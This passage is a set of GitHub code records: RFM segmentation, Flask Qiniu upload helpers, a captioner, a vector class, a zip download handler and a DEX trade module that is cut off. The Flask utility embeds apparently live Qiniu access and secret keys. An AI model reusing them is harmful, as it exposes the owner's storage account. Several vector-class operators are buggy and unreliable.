1])\nrfm[\"frequency_score\"] = pd.qcut(rfm[\"frequency\"].rank(method=\"first\"), 5, labels=[1, 2, 3, 4, 5])\nrfm[\"monetary_score\"] = pd.qcut(rfm[\"monetary\"], 5, labels=[1, 2, 3, 4, 5])\n\n#We will express recency_score and frequency_score as a single variable and save it as RF_SCORE.\nrfm[\"RF_SCORE\"] = (rfm[\"recency_score\"].astype(str) + rfm[\"frequency_score\"].astype(str))\nrfm.shape\n\n#Definition of RF Score as Segments\n#Step 1: We will make segment definitions for the generated RF scores.\n#Step 2: We will convert the scores into segments with the help of the seg_map below.\n\nseg_map = {\n r'[1-2][1-2]': 'hibernating',\n r'[1-2][3-4]': 'at_Risk',\n r'[1-2]5': 'cant_loose',\n r'3[1-2]': 'about_to_sleep',\n r'33': 'need_attention',\n r'[3-4][4-5]': 'loyal_customers',\n r'41': 'promising',\n r'51': 'new_customers',\n r'[4-5][2-3]': 'potential_loyalists',\n r'5[4-5]': 'champions'\n}\n\nrfm['segment'] = rfm['RF_SCORE'].replace(seg_map, regex=True)\nrfm.head()\nrfm.shape\n\n#Action\n\n#Step 1: Let's examine the recency, frequency and monetary averages of the segments.\n\nrfm[[\"segment\", \"recency\", \"frequency\", \"monetary\"]].groupby(\"segment\").agg([\"mean\", \"count\"])\n\n#Step 2: With the help of RFM analysis, let's find the customers in the relevant profile for the 2 cases given below and save the customer IDs as csv.\n#By presenting this csv file to the relevant units, we will ensure that work is done on these customers.\n\n#a. FLO includes a new women's shoe brand. The product prices of the brand it includes are above the general customer preferences.\n#For this reason, it is desired to contact the customers in the profile that will be interested in the promotion of the brand and product sales.\n#Those who shop from loyal customers (champions, loyal_customers) and women are the customers to be contacted privately.\n#Save the id numbers of these customers to the csv file.\n\nrfm = rfm.reset_index()\nrfm = rfm.merge(df[[\"master_id\", \"interested_in_categories_12\"]], how = 'left')\nrfm.head()\nrfm.shape\n\ndeneme = rfm.loc[((rfm[\"segment\"] == \"champions\") | (rfm[\"segment\"] == \"loyal_customers\")) & (rfm[\"interested_in_categories_12\"].str.contains(\"KADIN\")), [\"master_id\"]]\ndeneme.shape\ndeneme.head()\n\ndeneme.to_csv(\"rfm_a.csv\")\n\n#b.Nearly 40% discount is planned for Men's and Children's products. Previously interested in categories related to this discount\n#good customers but not to be lost customers who have not shopped for a long time, those who are asleep and new customers\n#want to be specifically targeted. Save the ids of the customers in the appropriate profile to the csv file.\n\ntarget_segments_customer_ids = rfm[rfm[\"segment\"].isin([\"cant_loose\",\"hibernating\",\"new_customers\"])][\"customer_id\"]\ncust_ids = df[(df[\"master_id\"].isin(target_segments_customer_ids)) & ((df[\"interested_in_categories_12\"].str.contains(\"ERKEK\"))|(df[\"interested_in_categories_12\"].str.contains(\"COCUK\")))][\"master_id\"]\ncust_ids.to_csv(\"indirim_hedef_müşteri_ids.csv\", index=False)\n\n#In this way, we have divided the customers into segments. By examining these segments in certain breakdowns, it is necessary to focus on which points \n#we can make the interpretation and reach the target audience customer. 
We can organize campaigns for the necessary segments, we can regain the necessary segments.\n","repo_name":"Birsenn/FLO_CRM_Analytics","sub_path":"FLO_RFM_Analysis.py","file_name":"FLO_RFM_Analysis.py","file_ext":"py","file_size_in_byte":6779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
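A small self-contained illustration of the scoring idea used in the record above, assuming only pandas; the toy values are made up:

import pandas as pd

toy = pd.DataFrame({"recency": [5, 40, 200, 90, 12],
                    "frequency": [20, 3, 1, 7, 15]})
# lower recency is better, so its labels run 5..1; frequency uses rank() to break ties
toy["r"] = pd.qcut(toy["recency"], 5, labels=[5, 4, 3, 2, 1])
toy["f"] = pd.qcut(toy["frequency"].rank(method="first"), 5, labels=[1, 2, 3, 4, 5])
toy["RF"] = toy["r"].astype(str) + toy["f"].astype(str)   # e.g. "55" maps to 'champions' in seg_map
print(toy)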
+{"seq_id":"24752468734","text":"import random\n\nfrom flask import session\nfrom qiniu import Auth, put_file, etag, put_data, BucketManager\nimport qiniu.config\n\nfrom apps.article.model import Article_type\nfrom apps.users.model import User\n\n\ndef upload_qiniu(filestorage):\n # 需要填写你的 Access Key 和 Secret Key\n access_key = '3kN7t5PKDJAKhdjZVSHhh7gOq8-Tuf9bc9mUYklE'\n secret_key = 'cAH0zVZQOfGfoQSa7AXPiAL7GN9JfxgqD5yeZOAZ'\n # 构建鉴权对象\n q = Auth(access_key, secret_key)\n # 要上传的空间\n bucket_name = 'zj-test-flask'\n # 上传后保存的文件名\n filename = filestorage.filename\n ran = random.randint(1, 1000)\n suffix = filename.rsplit('.')[-1]\n key = filename.rsplit('.')[0] + '_' + str(ran) + '.' + suffix\n # 生成上传 Token,可以指定过期时间等\n token = q.upload_token(bucket_name, key, 3600)\n # 要上传文件的本地路径\n # localfile = './sync/bbb.jpg'\n # ret, info = put_file(token, key, localfile)\n ret, info = put_data(token, key, filestorage.read())\n return ret, info\n\n\ndef delete_qiniu(filename):\n # 需要填写你的 Access Key 和 Secret Key\n access_key = '3kN7t5PKDJAKhdjZVSHhh7gOq8-Tuf9bc9mUYklE'\n secret_key = 'cAH0zVZQOfGfoQSa7AXPiAL7GN9JfxgqD5yeZOAZ'\n # 构建鉴权对象\n q = Auth(access_key, secret_key)\n # 要上传的空间\n bucket_name = 'zj-test-flask'\n # 初始化BucketManager\n bucket = BucketManager(q)\n # key就是要删除的文件的名字\n key = filename\n ret, info = bucket.delete(bucket_name, key)\n return info\n\n# 这个用不上,已经在钩子函数中拿到文章分类和用户对象,并赋值给g对象,渲染模板时可以直接取到g对象中的数据\ndef user_type():\n # 获取文章分类\n types = Article_type.query.all()\n # 登录用户\n user = None\n user_id = session.get('uid', None)\n if user_id:\n user = User.query.get(user_id)\n return user, types","repo_name":"zoker777/flaskBlog","sub_path":"apps/utils/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"10991953891","text":"from shapeworld import CaptionRealizer\nfrom shapeworld.world import World\n\n\nclass WorldCaptioner(object):\n\n MAX_ATTEMPTS = 10\n statistics_header = None\n\n def __init__(self, realizer=None, quantifier_tolerance=None):\n if realizer is None:\n realizer = CaptionRealizer.from_name(name=(realizer or 'dmrs'))\n assert isinstance(realizer, CaptionRealizer)\n self.realizer = realizer\n self.quantifier_tolerance = quantifier_tolerance if quantifier_tolerance is not None else 0.1\n self.statistics_filehandle = None\n\n def __call__(self, world, correct, mode=None):\n assert isinstance(world, dict) or isinstance(world, World)\n assert isinstance(correct, bool)\n assert mode in (None, 'train', 'test', 'validation')\n if isinstance(world, World):\n world = world.model()\n if mode is None:\n captioner = self.caption_world\n elif mode == 'train':\n captioner = self.caption_train_world\n elif mode == 'test':\n captioner = self.caption_test_world\n elif mode == 'validation':\n captioner = self.caption_validation_world\n for _ in range(WorldCaptioner.MAX_ATTEMPTS):\n caption = captioner(world, correct)\n if caption is not None:\n return caption\n return None\n\n def caption_world(self, world, correct):\n raise NotImplementedError\n\n def caption_train_world(self, world, correct):\n return self.caption_world(world, correct)\n\n def caption_validation_world(self, world, correct):\n return self.caption_world(world, correct)\n\n def caption_test_world(self, world, correct):\n return self.caption_world(world, correct)\n\n def realize(self, captions):\n return self.realizer.realize(captions=captions)\n\n def collect_statistics(self, filehandle, append=False):\n assert filehandle is not None\n self.statistics_filehandle = filehandle\n if not append and self.__class__.statistics_header:\n self.statistics_filehandle.write(self.__class__.statistics_header + '\\n')\n\n def close_statistics(self):\n if self.statistics_filehandle is not None:\n self.statistics_filehandle.close()\n\n def report(self, *instance):\n if self.statistics_filehandle is not None:\n self.statistics_filehandle.write(','.join(str(value) for value in instance) + '\\n')\n","repo_name":"codeaudit/ShapeWorld","sub_path":"shapeworld/captioner.py","file_name":"captioner.py","file_ext":"py","file_size_in_byte":2438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"3"}
+{"seq_id":"11674474138","text":"import collections\nimport Tkinter as TK\nimport math\nimport os\n\n\ndef path(filename):\n\tfilepath = os.path.realpath(__file__)\n\tdirpath = os.path.dirname(filepath)\n\tfullpath = os.path.join(dirpath,filename)\n\treturn fullpath\n\n\ndef line(a, b, x, y):\n\timport turtle\n\tturtle.up()\n\tturtle.goto(a, b)\n\tturtle.down()\n\tturtle.goto(x, y)\n\n\nclass vector(collections.Sequence):\n # pylint: disable=invalid-name\n\tPRECISION = 6\n\t\n\t__slots__ = ('_x', '_y', '_hash')\n\n\n\tdef __init__(self, x, y):\n\t\tself._hash = None\n\t\tself._x = round(x, self.PRECISION)\n\t\tself._y = round(y, self.PRECISION)\n\n\n\t@property\n\t#getter\n\tdef x(self):\n\t\treturn self._x\n\n\t@x.setter\n\tdef x(self, value):\n\t\tif self._hash is not None:\n\t\t\traise ValueError(\"Cannot set x after hashinhg\")\n\t\tself._x = round(value, self.PRECISION)\n\n\n\t@property\n\tdef y(self):\n\t\treturn self._y\n\t\n\t@y.setter\n\tdef y(self, value):\n\t\tif self._hash is not None:\n\t\t\traise ValueError(\"Cannot set y after hashinhg\")\n\t\tself._y = round(value, self.PRECISION)\n\n\n\n\tdef __hash__(self):\n\t\t#v.__hash__() -> hash(v)\n\t\t#v = vector(1, 2)\n\n\t\tif self._hash is None:\n\t\t\tpair = (self.x, self.y)\n\t\t\tself._hash = hash(pair)\n\n\t\treturn self._hash\n\n\n\tdef __len__(self):\n\t\treturn 2\n\n\n\tdef __getitem__(self, index):\n\t\tif index == 0:\n\t\t\treturn self.x\n\t\telif index == 1:\n\t\t\treturn self.y\n\t\telse:\n\t\t\traise IndexError\n\n\n\tdef copy(self):\n\t\ttype_self = type(self)\n\t\treturn type_self(self.x, self.y)\n\n\n\tdef __eq__(self, other):\n\t\t#v = w if v = vector(1, 2) = w = vector(1, 2)\n\n\t\tif isinstance(other, vector):\n\t\t\treturn self.x == other.x and self.y == other.y\n\n\t\treturn NotImplemented\n\n\n\tdef __ne__(self, other):\n\t\tif isinstance(other, vector):\n\t\t\treturn self.x != other.x and self.y != other.y\n\n\t\treturn NotImplemented\n\n\n\tdef __iadd__(self, other):\n\t\t#v.__iadd__(w) -> v += w\n\t\tif self._hash is not None:\n\t\t\traise ValueError(\"Cannot add vector after hashinhg\")\n\t\telif isinstance(other, vector):\n\t\t\tself.x = other.x\n\t\t\tself.y = other.y\n\t\telse:\n\t\t\tself.x += other\n\t\t\tself.y += other\n\t\treturn self\n\n\n\tdef __add__(self, other):\n\t\t#v.__iadd__(w) -> v + w\t\t\n\t\tcopy = self.copy()\n\t\treturn copy.__iadd__(other)\n\n\n\t__radd__ = __add__\n\n\tdef move(self, other):\n\t\t#move vector by other(n place)\n\t\t#v = vector(1, 2) w = vector(3, 4) v.move(w) c ==> vector(4, 6)\n\t\tself.__iadd__(other)\n\n\n\tdef __isub__(self, other):\n\t\t#v.__isub__(w) -> v -= w\n\t\tif self._hash is not None:\n\t\t\traise ValueError(\"Cannot subtract vector after hashinhg\")\n\t\telif isinstance(other, vector):\n\t\t\tself.x -= other.x\n\t\t\tself.y -= other.y\n\t\telse:\n\t\t\tself.x -= other\n\t\t\tself.y -= other\n\n\n\tdef __sub__(self, other):\n\t\t#v.__sub__(w) -> v-w\n\t\tcopy = self.copy()\n\t\treturn copy.__isub__(other)\n\n\n\tdef __imul__(self, other):\n\t\t#v.__imul__(w) => v*= w\n\t\tif self._hash is not None:\n\t\t\traise ValueError(\"Cannot multiply vector after hashinhg\")\n\t\telif isinstance(other, vector):\n\t\t\tself.x *= other.x\n\t\t\tself.y *= other.y\n\t\telse:\n\t\t\tself.x *= other\n\t\t\tself.y *= other\n\t\treturn self\n\n\n\tdef __mul__(self, other):\n\t\t#v.__mul__(w) => v * w\n\t\tcopy = self.copy.__imul__()\n\t\treturn copy.__imul__(other)\n\t\t\n\t__rmul__ = __mul__\n\t\n\n\tdef scale(self, other):\n\t\tself.__imul__(other)\n\n\n\tdef 
__itruediv__(self, other):\n\t\t#v.__itruediv__(w) => v /= w\n\t\tif self._hash is not None:\n\t\t\traise ValueError(\"Cannot divide vector after hashinhg\")\n\t\telif isinstance(other, vector):\n\t\t\tself.x /= other.x\n\t\t\tself.y /= other.y\n\t\telse:\n\t\t\tself.x /= other\n\t\t\tself.y /= other\n\t\treturn self\n\n\n\tdef __truediv__(self, other):\n\t\t#v.__truediv__(w) => v / w\n\t\tcopy = self.copy()\n\t\treturn copy.__itruediv__(other)\n\n\n\tdef __neg__(self):\n\t\t#v__neg__() => -v\n\t\tcopy = self.copy()\n\t\tcopy.x = -copy.x\n\t\tcopy.y = -copy.y\n\t\treturn copy\n\n\n\tdef __abs__(self):\n\t\t#vector(3, 4) => 5\n\t\treturn (self.x**2 + self.y**2)**0.5\n\n\n\tdef rotate(self, angle):\n\t\tif self._hash is not None:\n\t\t\traise ValueError(\"Cannot rotate vector after hashinhg\")\n\t\tradians = angle * math.pi/180.0\n\t\tcosine = math.cos(radians)\n\t\tsine = math.sin(radians)\n\n\n\t\tx = self.x\n\t\ty = self.y\n\n\t\tself.x = x * cosine - y * sine\n\t\tself.y = y * cosine + x * sine\n\n\n\tdef __repr__(self):\n\t\t#v.__repr__() => repr(v)\n\t\ttype_self = type(self)\n\t\tname = type_self.__name__\n\t\treturn '{}({!r},{!r})'.format(name, self.x, self.y)\n\n\t","repo_name":"NemoIII/gamepy","sub_path":"base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":4170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
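Typical use of the vector class above (Python 2, matching the `Tkinter` import); the values follow from the in-place operators and `PRECISION` rounding:

v = vector(1, 2)
w = vector(3, 4)
v.move(w)            # in-place via __iadd__: v becomes vector(4, 6)
print(abs(w))        # 5.0, the Euclidean length of (3, 4)
w.rotate(90)         # rotates in place: approximately vector(-4.0, 3.0)
frozen = vector(1, 1)
hash(frozen)         # once hashed, any mutation raises ValueError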
+{"seq_id":"11420435924","text":"# -*- coding: utf-8 -*-\r\n\r\n'''\r\nCreated on Jan 21, 2011\r\n\r\n@author: krizan\r\n'''\r\nfrom StringIO import StringIO\r\nfrom base64 import encode\r\nfrom data.model import Files, Email\r\nfrom google.appengine.ext import webapp\r\nimport base64\r\nimport logging\r\nimport zipfile\r\n\r\nclass DownloadZipFile(webapp.RequestHandler):\r\n def get(self, emailid):\r\n logging.info('downloading zip file for email: ' + emailid)\r\n emailid = str(emailid).strip()\r\n if emailid and emailid != '':\r\n email = Email.get(emailid)\r\n if email:\r\n logging.info('email attachments count: ' + str(len(email.attachments)))\r\n \r\n # create the zip stream\r\n zipstream=StringIO()\r\n zfile = zipfile.ZipFile(zipstream,\"w\")\r\n\r\n for attachment in email.attachments:\r\n file_attachment = Files.get(attachment)\r\n if file_attachment:\r\n zfile = self.addFile(zfile, file_attachment.name, file_attachment.content)\r\n \r\n zfile.close()\r\n zipstream.seek(0)\r\n \r\n self.response.headers['Content-Type'] = 'application/zip'\r\n self.response.headers['Content-Disposition'] = 'attachment; filename=\"attachments.zip\"'\r\n #self.response.out.write(zfile.content)\r\n while True:\r\n buf = zipstream.read(2048)\r\n if buf == \"\":\r\n break\r\n self.response.out.write(buf)\r\n \r\n def addFile(self, zipstream, fname, content):\r\n # store the contents in a stream\r\n f = StringIO(content)\r\n f.seek(0)\r\n \r\n logging.info(\"adding file [\" + fname + \"] with size f.len : \" + str(f.len/1024) + \"kb\")\r\n \r\n # write the contents to the zip file\r\n #zipstream.writestr(fname, content)\r\n #zipstream.writestr(fname.decode(\"utf-8\"), f.getvalue())\r\n zipstream.writestr(fname.encode('ascii'), f.getvalue())\r\n return zipstream\r\n","repo_name":"dejans11/my-gfeed","sub_path":"src/download_zip.py","file_name":"download_zip.py","file_ext":"py","file_size_in_byte":2106,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"34629680764","text":"import time\ndef timer(func):\n def func_wrapper(*arg, **kwargs):\n t0 = time.time()\n print('begin to run function \"{}\"'.format(func.__name__))\n result = func(*arg, **kwargs)\n t1 = time.time()\n t_diff = t1 - t0\n msg = 'finish function \"{}\", time used: {}m, {}s'\n print(msg.format(func.__name__, t_diff // 60, t_diff % 60))\n return result\n\n return func_wrapper","repo_name":"xiaoshijian/HM_COMPETITION","sub_path":"toolbox/decorator.py","file_name":"decorator.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"13301181696","text":"from collections import Counter\nimport string\n\nclass Solution:\n def customSortString(self, S: str, T: str) -> str:\n letter_count = Counter(T)\n other_letters = set(string.ascii_lowercase) - set(S)\n order = S + ''.join(other_letters)\n result = []\n\n for letter in order:\n result.extend([letter * letter_count[letter]])\n return ''.join(result)\n\nsol = Solution()\nS = \"cba\"\nT = \"abcd\"\nprint(sol.customSortString(S, T))","repo_name":"adalloul0928/Leetcode_Hell","sub_path":"Archive/Facebook/Other/customSortString.py","file_name":"customSortString.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"5142594692","text":"from functools import reduce\nfrom typing import List, cast\nfrom dataclasses import dataclass\n\nfrom convexus.sdkcore.constants import TradeType\nfrom convexus.sdkcore.utils.sortedInsert import sortedInsert\nfrom convexus.sdkcore.entities.errors import InsufficientInputAmountError\nfrom convexus.sdkcore.entities.fractions.fraction import Fraction\nfrom convexus.sdkcore.entities.fractions.price import Price\nfrom convexus.sdkcore.entities.fractions.percent import Percent\nfrom convexus.sdkcore.entities.fractions.currencyAmount import CurrencyAmount\nfrom convexus.sdkcore.entities.currency import Currency\nfrom convexus.sdk.entities.factoryProvider import PoolFactoryProvider\n\nfrom convexus.sdk.entities.route import Route\nfrom convexus.sdk.entities.pool import Pool\n\ndef tradeComparator (\n a: 'Trade',\n b: 'Trade'\n) -> int:\n \"\"\"\n * Trades comparator, an extension of the input output comparator that also considers other dimensions of the trade in ranking them\n * @template Currency The input token, either ICX or an IRC-2\n * @template Currency The output token, either ICX or an IRC-2\n * @template TradeType The trade type, either exact input or exact output\n * @param a The first trade to compare\n * @param b The second trade to compare\n * @returns A sorted ordering for two neighboring elements in a trade array\n \"\"\"\n # must have same input and output token for comparison\n assert a.inputAmount.currency.equals(b.inputAmount.currency), 'INPUT_CURRENCY'\n assert a.outputAmount.currency.equals(b.outputAmount.currency), 'OUTPUT_CURRENCY'\n\n if (a.outputAmount.equalTo(b.outputAmount)):\n if (a.inputAmount.equalTo(b.inputAmount)):\n # consider the number of hops since each hop costs gas\n aHops = reduce(lambda total, cur: total + len(cur.route.tokenPath), a.swaps, 0)\n bHops = reduce(lambda total, cur: total + len(cur.route.tokenPath), b.swaps, 0)\n return aHops - bHops\n\n # trade A requires less input than trade B, so A should come first\n if (a.inputAmount.lessThan(b.inputAmount)):\n return -1\n else:\n return 1\n else:\n # tradeA has less output than trade B, so should come second\n if (a.outputAmount.lessThan(b.outputAmount)):\n return 1\n else:\n return -1\n\n@dataclass\nclass BestTradeOptions:\n # how many results to return\n maxNumResults: int = 3\n # the maximum number of hops a trade should contain\n maxHops: int = 3\n\n@dataclass\nclass RouteInfo:\n route: Route\n inputAmount: CurrencyAmount\n outputAmount: CurrencyAmount\n\n@dataclass\nclass TradeConstructorArgs:\n routes: List[RouteInfo]\n tradeType: TradeType\n\n@dataclass\nclass RouteAmount:\n route: Route\n amount: CurrencyAmount\n\n@dataclass\nclass UncheckedTradeConstructorArguments:\n route: Route\n inputAmount: CurrencyAmount\n outputAmount: CurrencyAmount\n tradeType: TradeType\n\nclass Trade:\n \"\"\"\n * Represents a trade executed against a set of routes where some percentage of the input is\n * split across each route.\n *\n * Each route has its own set of pools. 
Pools can not be re-used across routes.\n *\n * Does not account for slippage, i.e., changes in price environment that can occur between\n * the time the trade is submitted and when it is executed.\n * @template Currency The input token, either ICX or an IRC-2\n * @template Currency The output token, either ICX or an IRC-2\n * @template TradeType The trade type, either exact input or exact output\n \"\"\"\n \n def __init__(self, args: TradeConstructorArgs):\n \"\"\"\n * Construct a trade by passing in the pre-computed property values\n * @param routes The routes through which the trade occurs\n * @param tradeType The type of trade, exact input or exact output\n \"\"\"\n routes: List[RouteInfo] = args.routes\n tradeType: TradeType = args.tradeType\n\n inputCurrency = routes[0].inputAmount.currency\n outputCurrency = routes[0].outputAmount.currency\n\n assert all(map(lambda routeInfo: inputCurrency.wrapped.equals(routeInfo.route.input.wrapped), routes)), 'INPUT_CURRENCY_MATCH'\n assert all(map(lambda routeInfo: outputCurrency.wrapped.equals(routeInfo.route.output.wrapped), routes)), 'OUTPUT_CURRENCY_MATCH'\n\n \"\"\"\n * The swaps of the trade, i.e. which routes and how much is swapped in each that\n * make up the trade.\n \"\"\"\n self.swaps: List[RouteInfo] = routes\n\n \"\"\"\n * The type of the trade, either exact in or exact out.\n \"\"\"\n self.tradeType: TradeType = tradeType\n\n \"\"\"\n * The cached result of the input amount computation\n * @private\n \"\"\"\n self.__inputAmount: CurrencyAmount | None = None\n \n \"\"\"\n * The cached result of the output amount computation\n * @private\n \"\"\"\n self.__outputAmount: CurrencyAmount | None = None\n \n \"\"\"\n * The cached result of the computed execution price\n * @private\n \"\"\"\n self.__executionPrice: Price | None = None\n \n \"\"\"\n * The cached result of the price impact computation\n * @private\n \"\"\"\n self.__priceImpact: Percent | None = None\n\n def __repr__(self) -> str:\n return str(self.__dict__)\n\n @property\n def route(self) -> Route:\n \"\"\"\n * @deprecated Deprecated in favor of 'swaps' property. If the trade consists of multiple routes\n * this will return an error.\n *\n * When the trade consists of just a single route, this returns the route of the trade,\n * i.e. 
which pools the trade goes through.\n \"\"\"\n assert len(self.swaps) == 1, 'MULTIPLE_ROUTES'\n return self.swaps[0].route\n\n @property\n def inputAmount(self) -> CurrencyAmount:\n \"\"\"\n * The input amount for the trade assuming no slippage.\n \"\"\"\n if self.__inputAmount:\n return self.__inputAmount\n\n inputCurrency = self.swaps[0].inputAmount.currency\n totalInputFromRoutes = reduce (lambda total, cur:\n total.add(cur),\n map(lambda swap: swap.inputAmount, self.swaps),\n CurrencyAmount.fromRawAmount(inputCurrency, 0)\n )\n\n self.__inputAmount = totalInputFromRoutes\n return self.__inputAmount\n\n @property\n def outputAmount(self) -> CurrencyAmount:\n \"\"\"\n * The output amount for the trade assuming no slippage.\n \"\"\"\n if (self.__outputAmount):\n return self.__outputAmount\n\n outputCurrency = self.swaps[0].outputAmount.currency\n totalOutputFromRoutes = reduce(lambda total, cur:\n total.add(cur),\n map(lambda swap: swap.outputAmount, self.swaps),\n CurrencyAmount.fromRawAmount(outputCurrency, 0)\n )\n\n self.__outputAmount = totalOutputFromRoutes\n return self.__outputAmount\n\n @property\n def executionPrice(self) -> Price:\n \"\"\"\n * The price expressed in terms of output amount/input amount.\n \"\"\"\n if not self.__executionPrice:\n self.__executionPrice = Price (\n self.inputAmount.currency,\n self.outputAmount.currency,\n self.inputAmount.quotient,\n self.outputAmount.quotient\n )\n return cast(Price, self.__executionPrice)\n\n @property\n def priceImpact(self) -> Percent:\n \"\"\"\n * Returns the percent difference between the route's mid price and the price impact\n \"\"\"\n if (self.__priceImpact):\n return self.__priceImpact\n\n spotOutputAmount = CurrencyAmount.fromRawAmount(self.outputAmount.currency, 0)\n for swap in self.swaps:\n midPrice = swap.route.midPrice\n spotOutputAmount = spotOutputAmount.add(midPrice.quote(swap.inputAmount))\n\n priceImpact = spotOutputAmount.subtract(self.outputAmount).divide(spotOutputAmount)\n self.__priceImpact = Percent(priceImpact.numerator, priceImpact.denominator)\n return self.__priceImpact\n\n @staticmethod\n def exactIn (\n poolFactoryProvider: PoolFactoryProvider,\n route: Route,\n amountIn: CurrencyAmount\n ) -> 'Trade':\n \"\"\"\n * Constructs an exact in trade with the given amount in and route\n * @template Currency The input token, either ICX or an IRC-2\n * @template Currency The output token, either ICX or an IRC-2\n * @param factoryProvider A Convexus Pool Factory provider\n * @param route The route of the exact in trade\n * @param amountIn The amount being passed in\n * @returns The exact in trade\n \"\"\"\n return Trade.fromRoute(poolFactoryProvider, route, amountIn, TradeType.EXACT_INPUT)\n\n @staticmethod\n def exactOut (\n poolFactoryProvider: PoolFactoryProvider,\n route: Route,\n amountOut: CurrencyAmount\n ) -> 'Trade':\n \"\"\"\n * Constructs an exact out trade with the given amount out and route\n * @template Currency The input token, either ICX or an IRC-2\n * @template Currency The output token, either ICX or an IRC-2\n * @param route The route of the exact out trade\n * @param amountOut The amount returned by the trade\n * @returns The exact out trade\n \"\"\"\n return Trade.fromRoute(poolFactoryProvider, route, amountOut, TradeType.EXACT_OUTPUT)\n\n @staticmethod\n def fromRoute (\n poolFactoryProvider: PoolFactoryProvider,\n route: Route,\n amount: CurrencyAmount,\n tradeType: TradeType\n ) -> 'Trade':\n \"\"\"\n * Constructs a trade by simulating swaps through the given route\n * @template 
Currency The input token, either ICX or an IRC-2.\n * @template Currency The output token, either ICX or an IRC-2.\n * @template TradeType The type of the trade, either exact in or exact out.\n * @param route route to swap through\n * @param amount the amount specified, either input or output, depending on tradeType\n * @param tradeType whether the trade is an exact input or exact output swap\n * @returns The route\n \"\"\"\n amounts: List[CurrencyAmount] = [None] * len(route.tokenPath)\n inputAmount: CurrencyAmount\n outputAmount: CurrencyAmount\n\n if (tradeType == TradeType.EXACT_INPUT):\n assert amount.currency.equals(route.input), 'INPUT'\n amounts[0] = amount.wrapped\n for i in range(len(route.tokenPath) - 1):\n pool = route.pools[i]\n outputAmount, _ = pool.getOutputAmount(amounts[i])\n amounts[i + 1] = outputAmount\n\n inputAmount = CurrencyAmount.fromFractionalAmount(route.input, amount.numerator, amount.denominator)\n outputAmount = CurrencyAmount.fromFractionalAmount(\n route.output,\n amounts[len(amounts) - 1].numerator,\n amounts[len(amounts) - 1].denominator\n )\n else:\n assert amount.currency.equals(route.output), 'OUTPUT'\n amounts[len(amounts) - 1] = amount.wrapped\n for i in range(len(route.tokenPath) - 1, 0, -1):\n pool = route.pools[i - 1]\n inputAmount, _ = pool.getInputAmount(amounts[i])\n amounts[i - 1] = inputAmount\n\n inputAmount = CurrencyAmount.fromFractionalAmount(route.input, amounts[0].numerator, amounts[0].denominator)\n outputAmount = CurrencyAmount.fromFractionalAmount(route.output, amount.numerator, amount.denominator)\n\n trade = Trade(TradeConstructorArgs(\n routes=[RouteInfo(route=route, inputAmount=inputAmount, outputAmount=outputAmount)],\n tradeType=tradeType\n ))\n\n trade.checkRoute(poolFactoryProvider)\n\n return trade\n\n @staticmethod\n def fromRoutes (\n poolFactoryProvider: PoolFactoryProvider,\n routes: List[RouteAmount],\n tradeType: TradeType\n ) -> 'Trade':\n \"\"\"\n * Constructs a trade from routes by simulating swaps\n *\n * @template Currency The input token, either ICX or an IRC-2.\n * @template Currency The output token, either ICX or an IRC-2.\n * @template TradeType The type of the trade, either exact in or exact out.\n * @param routes the routes to swap through and how much of the amount should be routed through each\n * @param tradeType whether the trade is an exact input or exact output swap\n * @returns The trade\n \"\"\"\n populatedRoutes: List[RouteInfo] = []\n\n for routeAmount in routes:\n amount = routeAmount.amount\n route = routeAmount.route\n amounts: List[CurrencyAmount] = [None] * len(route.tokenPath)\n inputAmount: CurrencyAmount\n outputAmount: CurrencyAmount\n\n if (tradeType == TradeType.EXACT_INPUT):\n assert amount.currency.equals(route.input), 'INPUT'\n inputAmount = CurrencyAmount.fromFractionalAmount(route.input, amount.numerator, amount.denominator)\n amounts[0] = CurrencyAmount.fromFractionalAmount(route.input.wrapped, amount.numerator, amount.denominator)\n\n for i in range(len(route.tokenPath) - 1):\n pool = route.pools[i]\n outputAmount, pool = pool.getOutputAmount(amounts[i])\n amounts[i + 1] = outputAmount\n\n outputAmount = CurrencyAmount.fromFractionalAmount(\n route.output,\n amounts[len(amounts) - 1].numerator,\n amounts[len(amounts) - 1].denominator\n )\n else:\n assert amount.currency.equals(route.output), 'OUTPUT'\n outputAmount = CurrencyAmount.fromFractionalAmount(route.output, amount.numerator, amount.denominator)\n amounts[len(amounts) - 1] = CurrencyAmount.fromFractionalAmount(\n 
route.output.wrapped,\n amount.numerator,\n amount.denominator\n )\n\n for i in range(len(route.tokenPath) - 1, 0, -1):\n pool = route.pools[i - 1]\n inputAmount, pool = pool.getInputAmount(amounts[i])\n amounts[i - 1] = inputAmount\n\n inputAmount = CurrencyAmount.fromFractionalAmount(route.input, amounts[0].numerator, amounts[0].denominator)\n\n populatedRoutes.append(RouteInfo(route, inputAmount, outputAmount))\n\n trade = Trade(TradeConstructorArgs(\n populatedRoutes,\n tradeType\n ))\n\n trade.checkRoute(poolFactoryProvider)\n return trade\n\n @staticmethod\n def createUncheckedTrade (\n poolFactoryProvider: PoolFactoryProvider,\n constructorArguments: UncheckedTradeConstructorArguments\n ) -> 'Trade':\n \"\"\"\n * Creates a trade without computing the result of swapping through the route. Useful when you have simulated the trade\n * elsewhere and do not have any tick data\n * @template Currency The input token, either ICX or an IRC-2\n * @template Currency The output token, either ICX or an IRC-2\n * @template TradeType The type of the trade, either exact in or exact out\n * @param constructorArguments The arguments passed to the trade constructor\n * @returns The unchecked trade\n \"\"\"\n trade = Trade(TradeConstructorArgs(\n routes = [RouteInfo (\n inputAmount=constructorArguments.inputAmount,\n outputAmount=constructorArguments.outputAmount,\n route=constructorArguments.route\n )],\n tradeType=constructorArguments.tradeType\n ))\n\n trade.checkRoute(poolFactoryProvider)\n return trade\n\n @staticmethod\n def createUncheckedTradeWithMultipleRoutes (\n poolFactoryProvider: PoolFactoryProvider,\n constructorArguments: TradeConstructorArgs\n ) -> 'Trade':\n \"\"\"\n * Creates a trade without computing the result of swapping through the 